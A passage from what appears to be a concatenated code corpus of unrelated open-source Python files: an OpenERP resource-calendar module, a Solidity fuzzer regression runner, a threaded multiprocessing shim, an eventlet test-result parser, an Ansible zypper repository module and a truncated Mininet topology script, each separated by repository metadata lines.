return [(dt_from - timedelta(hours=td), dt_from)]
dt_leave = self._get_leaves(cr, uid, id, resource)
dt_leave.reverse()
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
cr.execute("select hour_from,hour_to from resource_calendar_attendance where dayofweek='%s' and calendar_id=%s order by hour_from desc", (dt_from.weekday(),id))
for (hour_from,hour_to) in cr.fetchall():
leave_flag = False
if (hour_from<current_hour) and float_compare(todo, 0, 4):
m = min(hour_to, current_hour)
if (m-hour_from)>todo:
hour_from = m-todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(hour_from)), int((hour_from%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day, int(math.floor(m)), int((m%1) * 60))
result.append((d1, d2))
current_hour = hour_from
todo -= (m-hour_from)
dt_from -= timedelta(days=1)
current_hour = 24
maxrecur -= 1
result.reverse()
return result
# def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
def interval_get_multi(self, cr, uid, date_and_hours_by_cal, resource=False, byday=True):
def group(lst, key):
lst.sort(key=itemgetter(key))
grouped = groupby(lst, itemgetter(key))
return dict([(k, [v for v in itr]) for k, itr in grouped])
# END group
cr.execute("select calendar_id, dayofweek, hour_from, hour_to from resource_calendar_attendance order by hour_from")
hour_res = cr.dictfetchall()
hours_by_cal = group(hour_res, 'calendar_id')
results = {}
for d, hours, id in date_and_hours_by_cal:
dt_from = datetime.strptime(d, '%Y-%m-%d %H:%M:%S')
if not id:
td = int(hours)*3
results[(d, hours, id)] = [(dt_from, dt_from + timedelta(hours=td))]
continue
dt_leave = self._get_leaves(cr, uid, id, resource)
todo = hours
result = []
maxrecur = 100
current_hour = dt_from.hour
while float_compare(todo, 0, 4) and maxrecur:
for (hour_from,hour_to) in [(item['hour_from'], item['hour_to']) for item in hours_by_cal[id] if item['dayofweek'] == str(dt_from.weekday())]:
leave_flag = False
if (hour_to>current_hour) and float_compare(todo, 0, 4):
m = max(hour_from, current_hour)
if (hour_to-m)>todo:
hour_to = m+todo
dt_check = dt_from.strftime('%Y-%m-%d')
for leave in dt_leave:
if dt_check == leave:
dt_check = datetime.strptime(dt_check, '%Y-%m-%d') + timedelta(days=1)
leave_flag = True
if leave_flag:
break
else:
d1 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(m)), minutes=int((m%1) * 60))
d2 = datetime(dt_from.year, dt_from.month, dt_from.day) + timedelta(hours=int(math.floor(hour_to)), minutes=int((hour_to%1) * 60))
result.append((d1, d2))
current_hour = hour_to
todo -= (hour_to - m)
dt_from += timedelta(days=1)
current_hour = 0
maxrecur -= 1
results[(d, hours, id)] = result
return results
def interval_get(self, cr, uid, id, dt_from, hours, resource=False, byday=True):
"""Calculates Resource Working Internal Timing Based on Resource Calendar.
@param dt_from: start resource schedule calculation.
@param hours : total number of working hours to be scheduled.
@param resource: optional resource id, If supplied it will take care of
resource leave while scheduling.
@param byday: boolean flag bit enforce day wise scheduling
@return : list of scheduled working timing based on resource calendar.
"""
res = self.interval_get_multi(cr, uid, [(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)], resource, byday)[(dt_from.strftime('%Y-%m-%d %H:%M:%S'), hours, id)]
return res
def interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource=False):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource: optional resource id, If given resource leave will be
considered.
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
return self._interval_hours_get(cr, uid, id, dt_from, dt_to, resource_id=resource)
def _interval_hours_get(self, cr, uid, id, dt_from, dt_to, resource_id=False, timezone_from_uid=None, exclude_leaves=True, context=None):
""" Calculates the Total Working hours based on given start_date to
end_date, If resource id is supplied that it will consider the source
leaves also in calculating the hours.
@param dt_from : date start to calculate hours
@param dt_end : date end to calculate hours
@param resource_id: optional resource id, If given resource leave will be
considered.
@param timezone_from_uid: optional uid, if given we will considerer
working hours in that user timezone
@param exclude_leaves: optionnal, if set to True (default) we will exclude
resource leaves from working hours
@param context: current request context
@return : Total number of working hours based dt_from and dt_end and
resource if supplied.
"""
utc_tz = pytz.timezone('UTC')
local_tz = utc_tz
if timezone_from_uid:
users_obj = self.pool.get('res.users')
user_timezone = users_obj.browse(cr, uid, timezone_from_uid, context=context).partner_id.tz
if user_timezone:
try:
local_tz = pytz.timezone(user_timezone)
except pytz.UnknownTimeZoneError:
pass # fallback to UTC as local timezone
def utc_to_local_zone(naive_datetime):
utc_dt = utc_tz.localize(naive_datetime, is_dst=False)
return utc_dt.astimezone(local_tz)
def float_time_convert(float_val):
factor = float_val < 0 and -1 or 1
val = abs(float_val)
return (factor * int(math.floor(val)), int(round((val % 1) * 60)))
# Get slots hours per day
# {day_of_week: [(8, 12), (13, 17), ...], ...}
hours_range_per_weekday = {}
if id:
cr.execute("select dayofweek, hour_from,hour_to from resource_calendar_attendance where calendar_id=%s order by hour_from", (id,))
for weekday, hour_from, hour_to in cr.fetchall():
weekday = int(weekday)
hours_range_per_weekday.setdefault(weekday, [])
hours_range_per_weekday[weekday].append((hour_from, hour_to))
else:
# considering default working hours (Monday -> Friday, 8 -> 12, 13 -> 17)
for weekday in range(5):
hours_range_per_weekday[weekday] = [(8, 12), (13, 17)]
## Interval between dt_from - dt_to
##
## dt_from dt_to
## =============|==================|============
## [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ]
##
## [ : start of range
## ] : end of range
##
## case 1: range end before interval start (skip)
## case 2: range overlap interval start (fit start to internal)
## case 3: range within interval
## case 4: range overlap interval end (fit end to interval)
## case 5: range start after interval end (skip)
interval_start = utc_to_local_zone(dt_from)
interval_end = utc_to_local_zone(dt_to)
hours_timedelta = timedelta()
# Get leaves for requested resource
dt_leaves = set([])
if exclude_leaves and id:
dt_leaves = set(self._get_leaves(cr, uid, id, resource=resource_id))
for day in rrule.rrule(rrule.DAILY, dtstart=interval_start,
until=interval_end+timedelta(days=1),
byweekday=hours_range_per_weekday.keys()):
if exclude_leaves and day.strftime('%Y-%m-%d') in dt_leaves:
# XXX: futher improve leave management to allow for partial day leave
continue
for (range_from, range_to) in hours_range_per_weekday.get(day.weekday(), []):
range_from_hour, range_from_min = float_time_convert(range_from)
range_to_hour, range_to_min = float_time_convert(range_to)
daytime_start = local_tz.localize(day.replace(hour=range_from_hour, minute=range_from_min, second=0, tzinfo=None))
daytime_end = local_tz.localize(day.replace(hour=range_to_hour, minute=range_to_min, second=0, tzinfo=None))
# case 1 & 5: time range out of interval
if daytime_end < interval_start or daytime_start > interval_end:
continue
# case 2 & 4: adjust start, end to fit within interval
daytime_start = max(daytime_start, interval_start)
daytime_end = min(daytime_end, interval_end)
# case 2+, 4+, 3
hours_timedelta += (daytime_end - daytime_start)
# return timedelta converted to hours
return (hours_timedelta.days * 24.0 + hours_timedelta.seconds / 3600.0)
resource_calendar()
class resource_calendar_attendance(osv.osv):
_name = "resource.calendar.attendance"
_description = "Work Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'dayofweek': fields.selection([('0','Monday'),('1','Tuesday'),('2','Wednesday'),('3','Thursday'),('4','Friday'),('5','Saturday'),('6','Sunday')], 'Day of Week', required=True, select=True),
'date_from' : fields.date('Starting Date'),
'hour_from' : fields.float('Work from', required=True, help="Start and End time of working.", select=True),
'hour_to' : fields.float("Work to", required=True),
'calendar_id' : fields.many2one("resource.calendar", "Resource's Calendar", required=True),
}
_order = 'dayofweek, hour_from'
_defaults = {
'dayofweek' : '0'
}
resource_calendar_attendance()
def hours_time_string(hours):
""" convert a number of hours (float) into a string with format '%H:%M' """
minutes = int(round(hours * 60))
return "%02d:%02d" % divmod(minutes, 60)
class resource_resource(osv.osv):
_name = "resource.resource"
_description = "Resource Detail"
_columns = {
'name' : fields.char("Name", size=64, required=True),
'code': fields.char('Code', size=16),
'active' : fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the resource record without removing it."),
'company_id' : fields.many2one('res.company', 'Company'),
'resource_type': fields.selection([('user','Human'),('material','Material')], 'Resource Type', required=True),
'user_id' : fields.many2one('res.users', 'User', help='Related user name for the resource to manage its access.'),
'time_efficiency' : fields.float('Efficiency Factor', size=8, required=True, help="This field depict the efficiency of the resource to complete tasks. e.g resource put alone on a phase of 5 days with 5 tasks assigned to him, will show a load of 100% for this phase by default, but if we put a efficiency of 200%, then his load will only be 50%."),
'calendar_id' : fields.many2one("resource.calendar", "Working Time", help="Define the schedule of resource"),
}
_defaults = {
'resource_type' : 'user',
'time_efficiency' : 1,
'active' : True,
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'resource.resource', context=context)
}
def copy(self, cr, uid, id, default=None, context=None):
if default is None:
default = {}
if not default.get('name', False):
default.update(name=_('%s (copy)') % (self.browse(cr, uid, id, context=context).name))
return super(resource_resource, self).copy(cr, uid, id, default, context)
def generate_resources(self, cr, uid, user_ids, calendar_id, context=None):
"""
Return a list of Resource Class objects for the resources allocated to the phase.
"""
resource_objs = {}
user_pool = self.pool.get('res.users')
for user in user_pool.browse(cr, uid, user_ids, context=context):
resource_objs[user.id] = {
'name' : user.name,
'vacation': [],
'efficiency': 1.0,
}
resource_ids = self.search(cr, uid, [('user_id', '=', user.id)], context=context)
if resource_ids:
for resource in self.browse(cr, uid, resource_ids, context=context):
resource_objs[user.id]['efficiency'] = resource.time_efficiency
resource_cal = resource.calendar_id.id
if resource_cal:
leaves = self.compute_vacation(cr, uid, calendar_id, resource.id, resource_cal, context=context)
resource_objs[user.id]['vacation'] += list(leaves)
return resource_objs
def compute_vacation(self, cr, uid, calendar_id, resource_id=False, resource_calendar=False, context=None):
"""
Compute the vacation from the working calendar of the resource.
@param calendar_id : working calendar of the project
@param resource_id : resource working on phase/task
@param resource_calendar : working calendar of the resource
"""
resource_calendar_leaves_pool = self.pool.get('resource.calendar.leaves')
leave_list = []
if resource_id:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, ['|', ('calendar_id', '=', calendar_id),
('calendar_id', '=', resource_calendar),
('resource_id', '=', resource_id)
], context=context)
else:
leave_ids = resource_calendar_leaves_pool.search(cr, uid, [('calendar_id', '=', calendar_id),
('resource_id', '=', False)
], context=context)
leaves = resource_calendar_leaves_pool.read(cr, uid, leave_ids, ['date_from', 'date_to'], context=context)
for i in range(len(leaves)):
dt_start = datetime.strptime(leaves[i]['date_from'], '%Y-%m-%d %H:%M:%S')
dt_end = datetime.strptime(leaves[i]['date_to'], '%Y-%m-%d %H:%M:%S')
no = dt_end - dt_start
[leave_list.append((dt_start + timedelta(days=x)).strftime('%Y-%m-%d')) for x in range(int(no.days + 1))]
leave_list.sort()
return leave_list
def compute_working_calendar(self, cr, uid, calendar_id=False, context=None):
"""
Change the format of working calendar from 'Openerp' format to bring it into 'Faces' format.
@param calendar_id : working calendar of the project
"""
if not calendar_id:
# Calendar is not specified: working days: 24/7
return [('fri', '8:0-12:0','13:0-17:0'), ('thu', '8:0-12:0','13:0-17:0'), ('wed', '8:0-12:0','13:0-17:0'),
('mon', '8:0-12:0','13:0-17:0'), ('tue', '8:0-12:0','13:0-17:0')]
resource_attendance_pool = self.pool.get('resource.calendar.attendance')
time_range = "8:00-8:00"
non_working = ""
week_days = {"0": "mon", "1": "tue", "2": "wed","3": "thu", "4": "fri", "5": "sat", "6": "sun"}
wk_days = {}
wk_time = {}
wktime_list = []
wktime_cal = []
week_ids = resource_attendance_pool.search(cr, uid, [('calendar_id', '=', calendar_id)], context=context)
weeks = resource_attendance_pool.read(cr, uid, week_ids, ['dayofweek', 'hour_from', 'hour_to'], context=context)
# Convert time formats into appropriate format required
# and create a list like [('mon', '8:00-12:00'), ('mon', '13:00-18:00')]
for week in weeks:
res_str = ""
day = None
if week_days.get(week['dayofweek'],False):
day = week_days[week['dayofweek']]
wk_days[week['dayofweek']] = week_days[week['dayofweek']]
else:
raise osv.except_osv(_('Configuration Error!'),_('Make sure the Working time has been configured with proper week days!'))
hour_from_str = hours_time_string(week['hour_from'])
hour_to_str = hours_time_string(week['hour_to'])
res_str = hour_from_str + '-' + hour_to_str
wktime_list.append((day, res_str))
# Convert into format like [('mon', '8:00-12:00', '13:00-18:00')]
for item in wktime_list:
if wk_time.has_key(item[0]):
wk_time[item[0]].append(item[1])
else:
wk_time[item[0]] = [item[0]]
wk_time[item[0]].append(item[1])
for k,v in wk_time.items():
wktime_cal.append(tuple(v))
# Add for the non-working days like: [('sat, sun', '8:00-8:00')]
for k, v in wk_days.items():
if week_days.has_key(k):
week_days.pop(k)
for v in week_days.itervalues():
non_working += v + ','
if non_working:
wktime_cal.append((non_working[:-1], time_range))
return wktime_cal
resource_resource()
class resource_calendar_leaves(osv.osv):
_name = "resource.calendar.leaves"
_description = "Leave Detail"
_columns = {
'name' : fields.char("Name", size=64),
'company_id' : fields.related('calendar_id','company_id',type='many2one',relation='res.company',string="Company", store=True, readonly=True),
'calendar_id' : fields.many2one("resource.calendar", "Working Time"),
'date_from' : fields.datetime('Start Date', required=True),
'date_to' : fields.datetime('End Date', required=True),
'resource_id' : fields.many2one("resource.resource", "Resource", help="If empty, this is a generic holiday for the company. If a resource is set, the holiday/leave is only for this resource"),
}
def check_dates(self, cr, uid, ids, context=None):
leave = self.read(cr, uid, ids[0], ['date_from', 'date_to'])
if leave['date_from'] and leave['date_to']:
if leave['date_from'] > leave['date_to']:
return False
return True
_constraints = [
(check_dates, 'Error! leave start-date must be lower then leave end-date.', ['date_from', 'date_to'])
]
def onchange_resource(self, cr, uid, ids, resource, context=None):
result = {}
if resource:
resource_pool = self.pool.get('resource.resource')
result['calendar_id'] = resource_pool.browse(cr, uid, resource, context=context).calendar_id.id
return {'value': result}
return {'value': {'calendar_id': []}}
resource_calendar_leaves()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ethereum/solidity | scripts/regressions.py | 1 | 4285 | #!/usr/bin/env python3
from argparse import ArgumentParser
import sys
import os
import subprocess
import re
import glob
import threading
import time
DESCRIPTION = """Regressor is a tool to run regression tests in a CI env."""
class PrintDotsThread(object):
"""Prints a dot every "interval" (default is 300) seconds"""
def __init__(self, interval=300):
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True
thread.start()
def run(self):
""" Runs until the main Python thread exits. """
## Print a newline at the very beginning.
print("")
while True:
# Print dot
print(".")
time.sleep(self.interval)
class regressor():
_re_sanitizer_log = re.compile(r"""ERROR: (libFuzzer|UndefinedBehaviorSanitizer)""")
def __init__(self, description, args):
self._description = description
self._args = self.parseCmdLine(description, args)
self._repo_root = os.path.dirname(sys.path[0])
self._fuzzer_path = os.path.join(self._repo_root,
"build/test/tools/ossfuzz")
self._logpath = os.path.join(self._repo_root, "test_results")
def parseCmdLine(self, description, args):
argParser = ArgumentParser(description)
argParser.add_argument('-o', '--out-dir', required=True, type=str,
help="""Directory where test results will be written""")
return argParser.parse_args(args)
@staticmethod
def run_cmd(command, logfile=None, env=None):
"""
Args:
command (str): command to run
logfile (str): log file name
env (dict): dictionary holding key-value pairs for bash environment
variables
Returns:
int: The exit status of the command. Exit status codes are:
0 -> Success
1-255 -> Failure
"""
if not logfile:
logfile = os.devnull
if not env:
env = os.environ.copy()
with open(logfile, 'w') as logfh:
with subprocess.Popen(command, shell=True, executable='/bin/bash',
env=env, stdout=logfh,
stderr=subprocess.STDOUT) as proc:
ret = proc.wait()
logfh.close()
return ret
def process_log(self, logfile):
"""
Args:
logfile (str): log file name
Returns:
bool: Test status.
True -> Success
False -> Failure
"""
## Log may contain non ASCII characters, so we simply stringify them
## since they don't matter for regular expression matching
with open(logfile, 'rb') as f:
rawtext = str(f.read())
return not re.search(self._re_sanitizer_log, rawtext)
def run(self):
"""
Returns:
bool: Test status.
True -> All tests succeeded
False -> At least one test failed
"""
testStatus = []
for fuzzer in glob.iglob("{}/*_ossfuzz".format(self._fuzzer_path)):
basename = os.path.basename(fuzzer)
logfile = os.path.join(self._logpath, "{}.log".format(basename))
corpus_dir = "/tmp/solidity-fuzzing-corpus/{0}_seed_corpus" \
.format(basename)
cmd = "find {0} -type f | xargs -n1 sh -c '{1} $0 || exit 255'".format(corpus_dir, fuzzer)
self.run_cmd(cmd, logfile=logfile)
ret = self.process_log(logfile)
if not ret:
print(
"\t[-] libFuzzer reported failure for {0}. "
"Failure logged to test_results".format(
basename))
testStatus.append(False)
else:
print("\t[+] {0} passed regression tests.".format(basename))
testStatus.append(True)
return all(testStatus)
if __name__ == '__main__':
dotprinter = PrintDotsThread()
tool = regressor(DESCRIPTION, sys.argv[1:])
sys.exit(not tool.run())
| gpl-3.0 |
zhjunlang/kbengine | kbe/src/lib/python/Lib/multiprocessing/dummy/__init__.py | 79 | 2881 | #
# Support for the API of the multiprocessing package using threads
#
# multiprocessing/dummy/__init__.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
__all__ = [
'Process', 'current_process', 'active_children', 'freeze_support',
'Lock', 'RLock', 'Semaphore', 'BoundedSemaphore', 'Condition',
'Event', 'Barrier', 'Queue', 'Manager', 'Pipe', 'Pool', 'JoinableQueue'
]
#
# Imports
#
import threading
import sys
import weakref
import array
from .connection import Pipe
from threading import Lock, RLock, Semaphore, BoundedSemaphore
from threading import Event, Condition, Barrier
from queue import Queue
#
#
#
class DummyProcess(threading.Thread):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
threading.Thread.__init__(self, group, target, name, args, kwargs)
self._pid = None
self._children = weakref.WeakKeyDictionary()
self._start_called = False
self._parent = current_process()
def start(self):
assert self._parent is current_process()
self._start_called = True
if hasattr(self._parent, '_children'):
self._parent._children[self] = None
threading.Thread.start(self)
@property
def exitcode(self):
if self._start_called and not self.is_alive():
return 0
else:
return None
#
#
#
Process = DummyProcess
current_process = threading.current_thread
current_process()._children = weakref.WeakKeyDictionary()
def active_children():
children = current_process()._children
for p in list(children):
if not p.is_alive():
children.pop(p, None)
return list(children)
def freeze_support():
pass
#
#
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return 'Namespace(%s)' % str.join(', ', temp)
dict = dict
list = list
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def _get(self):
return self._value
def _set(self, value):
self._value = value
value = property(_get, _set)
def __repr__(self):
return '<%s(%r, %r)>'%(type(self).__name__,self._typecode,self._value)
def Manager():
return sys.modules[__name__]
def shutdown():
pass
def Pool(processes=None, initializer=None, initargs=()):
from ..pool import ThreadPool
return ThreadPool(processes, initializer, initargs)
JoinableQueue = Queue
| lgpl-3.0 |
2013Commons/HUE-SHARK | desktop/core/ext-py/eventlet-0.9.14/tests/parse_results.py | 7 | 3671 | import sys
import os
import traceback
try:
import sqlite3
except ImportError:
import pysqlite2.dbapi2 as sqlite3
import re
import glob
def parse_stdout(s):
argv = re.search('^===ARGV=(.*?)$', s, re.M).group(1)
argv = argv.split()
testname = argv[-1]
del argv[-1]
hub = None
reactor = None
while argv:
if argv[0]=='--hub':
hub = argv[1]
del argv[0]
del argv[0]
elif argv[0]=='--reactor':
reactor = argv[1]
del argv[0]
del argv[0]
else:
del argv[0]
if reactor is not None:
hub += '/%s' % reactor
return testname, hub
unittest_delim = '----------------------------------------------------------------------'
def parse_unittest_output(s):
s = s[s.rindex(unittest_delim)+len(unittest_delim):]
num = int(re.search('^Ran (\d+) test.*?$', s, re.M).group(1))
ok = re.search('^OK$', s, re.M)
error, fail, timeout = 0, 0, 0
failed_match = re.search(r'^FAILED \((?:failures=(?P<f>\d+))?,? ?(?:errors=(?P<e>\d+))?\)$', s, re.M)
ok_match = re.search('^OK$', s, re.M)
if failed_match:
assert not ok_match, (ok_match, s)
fail = failed_match.group('f')
error = failed_match.group('e')
fail = int(fail or '0')
error = int(error or '0')
else:
assert ok_match, repr(s)
timeout_match = re.search('^===disabled because of timeout: (\d+)$', s, re.M)
if timeout_match:
timeout = int(timeout_match.group(1))
return num, error, fail, timeout
def main(db):
c = sqlite3.connect(db)
c.execute('''create table if not exists parsed_command_record
(id integer not null unique,
testname text,
hub text,
runs integer,
errors integer,
fails integer,
timeouts integer,
error_names text,
fail_names text,
timeout_names text)''')
c.commit()
parse_error = 0
SQL = ('select command_record.id, command, stdout, exitcode from command_record '
'where not exists (select * from parsed_command_record where '
'parsed_command_record.id=command_record.id)')
for row in c.execute(SQL).fetchall():
id, command, stdout, exitcode = row
try:
testname, hub = parse_stdout(stdout)
if unittest_delim in stdout:
runs, errors, fails, timeouts = parse_unittest_output(stdout)
else:
if exitcode == 0:
runs, errors, fails, timeouts = 1,0,0,0
if exitcode == 7:
runs, errors, fails, timeouts = 0,0,0,1
elif exitcode:
runs, errors, fails, timeouts = 1,1,0,0
except Exception:
parse_error += 1
sys.stderr.write('Failed to parse id=%s\n' % id)
print repr(stdout)
traceback.print_exc()
else:
print id, hub, testname, runs, errors, fails, timeouts
c.execute('insert into parsed_command_record '
'(id, testname, hub, runs, errors, fails, timeouts) '
'values (?, ?, ?, ?, ?, ?, ?)',
(id, testname, hub, runs, errors, fails, timeouts))
c.commit()
if __name__=='__main__':
if not sys.argv[1:]:
latest_db = sorted(glob.glob('results.*.db'), key=lambda f: os.stat(f).st_mtime)[-1]
print latest_db
sys.argv.append(latest_db)
for db in sys.argv[1:]:
main(db)
execfile('generate_report.py')
| apache-2.0 |
perzizzle/ansible-modules-extras | packaging/os/zypper_repository.py | 22 | 8763 | #!/usr/bin/python
# encoding: utf-8
# (c) 2013, Matthias Vogelgesang <[email protected]>
# (c) 2014, Justin Lecher <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: zypper_repository
author: "Matthias Vogelgesang (@matze)"
version_added: "1.4"
short_description: Add and remove Zypper repositories
description:
- Add or remove Zypper repositories on SUSE and openSUSE
options:
name:
required: false
default: none
description:
- A name for the repository. Not required when adding repofiles.
repo:
required: false
default: none
description:
- URI of the repository or .repo file. Required when state=present.
state:
required: false
choices: [ "absent", "present" ]
default: "present"
description:
- A source string state.
description:
required: false
default: none
description:
- A description of the repository
disable_gpg_check:
description:
- Whether to disable GPG signature checking of
all packages. Has an effect only if state is
I(present).
required: false
default: "no"
choices: [ "yes", "no" ]
aliases: []
refresh:
description:
- Enable autorefresh of the repository.
required: false
default: "yes"
choices: [ "yes", "no" ]
aliases: []
notes: []
requirements: [ zypper ]
'''
EXAMPLES = '''
# Add NVIDIA repository for graphics drivers
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=present
# Remove NVIDIA repository
- zypper_repository: name=nvidia-repo repo='ftp://download.nvidia.com/opensuse/12.2' state=absent
# Add python development repository
- zypper_repository: repo=http://download.opensuse.org/repositories/devel:/languages:/python/SLE_11_SP3/devel:languages:python.repo
'''
REPO_OPTS = ['alias', 'name', 'priority', 'enabled', 'autorefresh', 'gpgcheck']
def zypper_version(module):
"""Return (rc, message) tuple"""
cmd = ['/usr/bin/zypper', '-V']
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
if rc == 0:
return rc, stdout
else:
return rc, stderr
def _parse_repos(module):
"""parses the output of zypper -x lr and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', '-x', 'lr']
repos = []
from xml.dom.minidom import parseString as parseXML
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
dom = parseXML(stdout)
repo_list = dom.getElementsByTagName('repo')
for repo in repo_list:
opts = {}
for o in REPO_OPTS:
opts[o] = repo.getAttribute(o)
opts['url'] = repo.getElementsByTagName('url')[0].firstChild.data
# A repo can be uniquely identified by an alias + url
repos.append(opts)
return repos
def _parse_repos_old(module):
"""parses the output of zypper sl and returns a parse repo dictionary"""
cmd = ['/usr/bin/zypper', 'sl']
repos = []
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
for line in stdout.split('\n'):
matched = re.search(r'\d+\s+\|\s+(?P<enabled>\w+)\s+\|\s+(?P<autorefresh>\w+)\s+\|\s+(?P<type>\w+)\s+\|\s+(?P<name>\w+)\s+\|\s+(?P<url>.*)', line)
if matched == None:
continue
m = matched.groupdict()
m['alias']= m['name']
m['priority'] = 100
m['gpgcheck'] = 1
repos.append(m)
return repos
def repo_exists(module, old_zypper, **kwargs):
def repo_subset(realrepo, repocmp):
for k in repocmp:
if k not in realrepo:
return False
for k, v in realrepo.items():
if k in repocmp:
if v.rstrip("/") != repocmp[k].rstrip("/"):
return False
return True
if old_zypper:
repos = _parse_repos_old(module)
else:
repos = _parse_repos(module)
for repo in repos:
if repo_subset(repo, kwargs):
return True
return False
def add_repo(module, repo, alias, description, disable_gpg_check, old_zypper, refresh):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sa']
else:
cmd = ['/usr/bin/zypper', 'ar', '--check']
if repo.startswith("file:/") and old_zypper:
cmd.extend(['-t', 'Plaindir'])
else:
cmd.extend(['-t', 'plaindir'])
if description:
cmd.extend(['--name', description])
if disable_gpg_check and not old_zypper:
cmd.append('--no-gpgcheck')
if refresh:
cmd.append('--refresh')
cmd.append(repo)
if not repo.endswith('.repo'):
cmd.append(alias)
rc, stdout, stderr = module.run_command(cmd, check_rc=False)
changed = rc == 0
if rc == 0:
changed = True
elif 'already exists. Please use another alias' in stderr:
changed = False
else:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
return changed
def remove_repo(module, repo, alias, old_zypper):
if old_zypper:
cmd = ['/usr/bin/zypper', 'sd']
else:
cmd = ['/usr/bin/zypper', 'rr']
if alias:
cmd.append(alias)
else:
cmd.append(repo)
rc, stdout, stderr = module.run_command(cmd, check_rc=True)
changed = rc == 0
return changed
def fail_if_rc_is_null(module, rc, stdout, stderr):
if rc != 0:
#module.fail_json(msg=stderr if stderr else stdout)
if stderr:
module.fail_json(msg=stderr)
else:
module.fail_json(msg=stdout)
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(required=False),
repo=dict(required=False),
state=dict(choices=['present', 'absent'], default='present'),
description=dict(required=False),
disable_gpg_check = dict(required=False, default='no', type='bool'),
refresh = dict(required=False, default='yes', type='bool'),
),
supports_check_mode=False,
)
repo = module.params['repo']
state = module.params['state']
name = module.params['name']
description = module.params['description']
disable_gpg_check = module.params['disable_gpg_check']
refresh = module.params['refresh']
def exit_unchanged():
module.exit_json(changed=False, repo=repo, state=state, name=name)
rc, out = zypper_version(module)
match = re.match(r'zypper\s+(\d+)\.(\d+)\.(\d+)', out)
if not match or int(match.group(1)) > 0:
old_zypper = False
else:
old_zypper = True
# Check run-time module parameters
if state == 'present' and not repo:
module.fail_json(msg='Module option state=present requires repo')
if state == 'absent' and not repo and not name:
module.fail_json(msg='Alias or repo parameter required when state=absent')
if repo and repo.endswith('.repo'):
if name:
module.fail_json(msg='Incompatible option: \'name\'. Do not use name when adding repo files')
else:
if not name and state == "present":
module.fail_json(msg='Name required when adding non-repo files:')
if repo and repo.endswith('.repo'):
exists = repo_exists(module, old_zypper, url=repo, alias=name)
elif repo:
exists = repo_exists(module, old_zypper, url=repo)
else:
exists = repo_exists(module, old_zypper, alias=name)
if state == 'present':
if exists:
exit_unchanged()
changed = add_repo(module, repo, name, description, disable_gpg_check, old_zypper, refresh)
elif state == 'absent':
if not exists:
exit_unchanged()
changed = remove_repo(module, repo, name, old_zypper)
module.exit_json(changed=changed, repo=repo, state=state)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
lishuai12/onosfw-L3 | tools/test/topos/rftesttopo.py | 35 | 1679 | #!/usr/bin/env python
"""
"""
from mininet.topo import Topo
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import Node
from mininet.node import CPULimitedHost
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
from mininet.util import dumpNodeConnections
class ReactiveForwardingTestTopo( Topo ):
"Internet Topology Zoo Specimen."
def __init__( self ):
"Create a topology."
# Initialize Topology
Topo.__init__( self )
# add nodes, switches first...
s1 = self.addSwitch( 's1' )
s2 = self.addSwitch( 's2' )
s3 = self.addSwitch( 's3' )
s4 = self.addSwitch( 's4' )
s5 = self.addSwitch( 's5' )
s6 = self.addSwitch( 's6' )
s7 = self.addSwitch( 's7' )
s8 = self.addSwitch( 's8' )
s9 = self.addSwitch( 's9' )
# ... and now hosts
h1 = self.addHost( 'h1' )
h2 = self.addHost( 'h2' )
h3 = self.addHost( 'h3' )
h4 = self.addHost( 'h4' )
# add edges between switch and corresponding host
self.addLink( s1 , h1 )
self.addLink( s2 , h2 )
self.addLink( s3 , h3 )
self.addLink( s4 , h4 )
# add edges between switches
self.addLink( s1 , s5 )
self.addLink( s2 , s5 )
self.addLink( s2 , s8 )
